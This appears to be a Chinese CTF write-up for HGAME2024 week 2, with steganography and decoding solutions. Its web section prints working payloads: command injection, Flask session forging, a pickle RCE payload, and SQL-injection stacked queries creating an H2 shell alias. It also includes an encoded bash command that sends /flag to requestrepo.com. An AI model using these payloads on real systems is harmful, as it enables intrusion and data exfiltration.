HGAME2024_week2_wp

Sc0fie1d included in categories CTF Wp

2024-02-14 2024-03-25 483 words 3 minutes

Contents

HGAME2024_week2_web&misc

Week2

web

[What the cow say?]

除了反引号，$()也可以

1

`ls /`

直接用cat命令会被waf拦截

1

`tac /fla*/fla*`

[Select More Courses]

登陆界面，使用top1000字典进行爆破

根据提示，应该是时间竞争

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


POST /api/expand HTTP/1.1
Host: 139.196.183.57:30232
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://139.196.183.57:30232/expand
Content-Type: application/json
Content-Length: 23
Origin: http://139.196.183.57:30232
Connection: close
Cookie: session=MTcwODA2NzE4MXxEWDhFQVFMX2dBQUJFQUVRQUFBcV80QUFBUVp6ZEhKcGJtY01DZ0FJZFhObGNtNWhiV1VHYzNSeWFXNW5EQW9BQ0cxaE5XaHlNREJ0fIP0P43CugxLBJt9xdo6NEpISwrwf3-CXDctl9thdqyW

{"username":"ma5hr00m"}

payload类型选null并无限重复发包

再返回自主选课查看

[myflask]

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37


import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezone

currentDateAndTime = datetime.now(timezone('Asia/Shanghai'))
currentTime = currentDateAndTime.strftime("%H%M%S")

app = Flask(__name__)
# Tips: Try to crack this first ↓
app.config['SECRET_KEY'] = currentTime
print(currentTime)

@app.route('/')
def index():
    session['username'] = 'guest'
    return send_file('app.py')

@app.route('/flag', methods=['GET', 'POST'])
def flag():
    if not session:
        return 'There is no session available in your client :('
    if request.method == 'GET':
        return 'You are {} now'.format(session['username'])
    
    # For POST requests from admin
    if session['username'] == 'admin':
        pickle_data=base64.b64decode(request.form.get('pickle_data'))
        # Tips: Here try to trigger RCE
        userdata=pickle.loads(pickle_data)
        return userdata
    else:
        return 'Access Denied'
 
if __name__=='__main__':
    app.run(debug=True, host="0.0.0.0")

[flask中session的那些事](flask中session的那些事 (ctf.org.cn))

pickle—— Python 物件序列化

flask-session伪造

访问/flag

由以下代码可知，SECRET_KEY为6位数字

1
2
3
4
5
6


currentDateAndTime = datetime.now(timezone('Asia/Shanghai'))
currentTime = currentDateAndTime.strftime("%H%M%S")

app = Flask(__name__)
# Tips: Try to crack this first ↓
app.config['SECRET_KEY'] = currentTime

使用crunch生成6位数字字典

1

crunch 6 6 0123456789 -o ~/000000-999999.txt

爆破SECRET_KEY

1

flask-unsign  --unsign --cookie "eyJ1c2VybmFtZSI6Imd1ZXN0In0.Zc8itA.-x96nzpnRAmc-tQCxN5uxYLhlQA" --no-literal-eval --wordlist 000000-999999.txt

得到SECRET_KEY为165350并进行session伪造

1

flask-unsign --sign --cookie "{'username': 'admin'}" --secret 165350 --no-literal-eval

将cookie写入浏览器，访问/flag接口进行验证

pickle反序列化rce

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


@app.route('/flag', methods=['GET', 'POST'])
def flag():
    ...
    ...
    # For POST requests from admin
    if session['username'] == 'admin':
        pickle_data=base64.b64decode(request.form.get('pickle_data'))
        # Tips: Here try to trigger RCE
        userdata=pickle.loads(pickle_data)
        return userdata
    ...

用POST方法请求/flag接口，程序使用pickle.dumps方法反序列化提交的pickle_data参数，并返回反序列化结果

构造__reduce__方法进行rce

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


import pickle
import base64
from urllib.parse import urlencode

class myflaskrce:
	def __reduce__(self):
		return (open, ('/flag', 'r'))
	
payload = base64.b64encode(pickle.dumps(myflaskrce()))
post_params = {'pickle_data': payload}
print(urlencode(post_params))

执行脚本，得到payload

1

pickle_data=gANjaW8Kb3BlbgpxAFgFAAAAL2ZsYWdxAVgBAAAAcnEChnEDUnEELg%3D%3D

随后发包

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


POST /flag HTTP/1.1
Host: 139.196.183.57:32139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0.Zc8ulQ.hoc3E0E5-vcmVRCr9gVve05SKG4
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

pickle_data=gANjaW8Kb3BlbgpxAFgFAAAAL2ZsYWdxAVgBAAAAcnEChnEDUnEELg%3D%3D

[search4member]

sql注入–堆叠注入实现rce

尝试a' or 1=1 --+，得到表中所有数据

回显有三个字段。查询库名：

1

a' union select 1,2,database() --+

Spring Boot Actuator H2 RCE漏洞复现

1

a'; CREATE ALIAS SHELL AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream());  if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}';'

rce，通过dnslog外带

https://requestrepo.com/

1

a';CALL SHELL('bash -c {echo,Y3VybCBgY2F0IC9mbGFnYC5kN3VobWE4ai5yZXF1ZXN0cmVwby5jb20=}|{base64,-d}|{bash,-i}');'

misc

[ek1ng_want_girlfriend]

hgame{ek1ng_want_girlfriend_qq_761042182}

[ezWord]

将docx文件后缀改为zip并解压

在\attachment\这是一个word文件\word\media文件发现提示

根据恭喜.txt推测为双图隐写

得到解压密码

T1hi3sI4sKey

解压后得到secret.txt文本

根据文本特征推测为垃圾邮件编码

https://www.spammimic.com/decode.shtml

得到文本

1

籱籰籪籶籮粄簹籴籨粂籸籾籨籼簹籵籿籮籨籪籵簺籨籽籱簼籨籼籮籬类簼籽粆

ROT-8000解码

Chiffre ROT8000 - Déchiffrer, Decoder, Encoder en Ligne (dcode.fr)

[龙之舞]

音频的频谱分析，发现可疑信息

进行反转和镜像

KEY:5H8w1nlWCX3hQLG

使用deepsound工具

提取出XXX.zip并解压，得到gif文件，会看到有二维码闪烁

对gif文件进行逐帧提取

拼合二维码

对二维码进行修复

https://scofield-1313710994.cos.ap-beijing.myqcloud.com/image-20240220232903853.png